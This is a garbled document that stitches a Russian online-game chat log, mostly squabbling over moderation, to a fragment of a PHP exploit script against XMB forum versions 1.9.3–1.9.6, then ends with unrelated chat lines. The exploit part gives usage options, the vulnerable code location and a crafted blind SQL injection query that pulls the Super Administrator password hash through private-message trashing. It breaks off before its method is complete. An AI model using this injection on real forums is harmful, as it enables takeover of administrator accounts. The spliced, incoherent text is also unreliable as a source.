20:12 blondex: mkaz, бай, бай !! завтра вернусь ))
20:11 mkaz: blondex,
20:10 Andyret: mkaz, понятно
20:09 mkaz: Andyret, нет конечно посылать можно но в культурной форме а материться нельзя...
20:09 Andyret: mkaz, а матерится посылать куда подальше нельзя
20:05 mkaz: Beretta_Gun,
20:04 прокурор mkaz: удалил 'Сухов' на 10 минут (мат)
->20:01 mkaz: AGRONOM, вах вместе время прожигать будем тама...
20:00 AGRONOM: mkaz, ... ты много себе позволяеш при книжке прокурора, задумайся !
->20:00 mkaz: AGRONOM, вах..ну ты сказал...мальчик Вы случаем не болван?
19:58 AGRONOM: mkaz, не тыкай мне ... учи правила .. не разводи тут демогогию ! и будет тебе счастье !
->19:57 mkaz: AGRONOM, слух ты пресикая...не нарушай сам..и будет тебе счастье...
19:56 AGRONOM: mkaz, это ты ворчиш, я нарушения пресекаю в отличае от тебя .. и вааще ...
->19:55 mkaz: AGRONOM, ой дедушка агр...ты что тут варчишь много...?
19:55 AGRONOM: mkaz, иди в банк лучше бабло зарабатывай и не учи старших жизни ! хыыы
19:54 AGRONOM: mkaz, ...я не бог ... не надо засарять чат синим флудом .. демократию развели ... панимеш ли ... хыыы
->19:53 mkaz: AGRONOM, слух нефиг...тут мудрить перепишут правила..тоды действуй не фиг ставить себя богом...
19:52 AGRONOM: mkaz, ага ... он уже нарушил - синим, аоздняк там предупреждать, в топку сразу , ибо нефиг ! не децкий сад, хватит уже сюсюкаться ! :)))
->19:51 mkaz: AGRONOM, ты тоже учи клюшка..сначала по правилам предупреждают потом только если человек не понимает банят..разве нет??
19:50 AGRONOM: mkaz, ... учи правила ! флудить нельзя, тем более синим цветом ! фирштейн ! :)
->19:49 mkaz: AGRONOM, билет в детройт--тебе заказан...
19:48 AGRONOM: mkaz, учи материальную часть ! :)
->19:48 mkaz: AGRONOM, ты че кашки борзянки обьелся??
19:47 mkaz: Вы выиграли. Получено 23 опыта и 0 наличных Sr.
19:43 mkaz: Gold_Bruno,
19:34 mkaz: -=-=-=К О М А Н Д О С-=-=-=-=
19:30 Akela1: mkaz, соку
19:29 mkaz: Akela1,
19:28 mkaz: РокКот,
19:28 mkaz: Нецелованная_детка,
19:23 киссска23: mkaz,
19:23 Нецелованная_детка: mkaz,
19:23 mkaz: киссска23,
да я и не говорил что это про друзей, друзей у меня вообще нет. с недавних пор.. я в общем говорю.. я с каждной минутой убеждаюсь. что мной просто пользуются.. хватит.. теперь я злой и страшный рыжий лис... ррр
/*
works with magic_quotes=off
Mysql >= 4.1 (allowing subs)
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path username password OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to XMB \n";
echo "user/pass: you need a valid user account\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix (default: xmb_)\r\n";
echo " -d[delay] \" a delay between posts (there is an antiflood protection, default: 5)\r\n";
echo " -p[port]: \" a port other than 80\n";
echo " -P[ip:port]: \" a proxy\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /xmb/ user pass -d6\n";
echo "php ".$argv[0]." localhost /xmb/Files/ user pass -Txmb191_\n";
die;
}
/* software site: http://www.xmbforum.com/
tested versions:
XMB 1.9.3 Final
XMB 1.9.4 Final
XMB 1.9.5 Final
XMB 1.9.6 Alpha
download page: http://snaps.xmbforum.com/
vulnerable code in u2u.inc.php near lines 176-219 (code taken from 1.9.5):
...
function u2u_send($u2uid, $msgto, $subject, $message, $u2upreview) {
global $db, $self, $lang, $username, $SETTINGS, $table_u2u, $del;
global $u2uheader, $u2ufooter, $u2ucount, $u2uquota;
global $altbg1, $altbg2, $bordercolor, $borderwidth, $tablespace, $cattext, $thewidth;
global $forward, $reply;
there is a global protection in xmb.php but [[ totally break the rules, so,
with magic_quotes_gpc=off, we have sql injection in [*], affected query could become
UPDATE xmb_u2u SET folder='Trash' WHERE u2uid='9999999999' or (1=(SELECT(IF((ASCII(SUBSTRING(password,1,1))=48),1,0)) FROM xmb_members WHERE status='Super Administrator') AND owner='rgod'/*' AND owner='rgod'
because MySQL >= 4.1 allows SELECT subquery.
By sending yourself private messages, trashing them and resend you can
ask true/false questions to the database to extract admin username/password hash pair
you do not need to force the md5 hash, you can set a new cookie like this:
сейчас у тебя тоже самое.. и мне это неприятно...хотя бы ради меня мог скрыть(не удалять) это сообщение..знал же что могу прочесть...
.. что, де жа вю у тебя да?... ну-ну..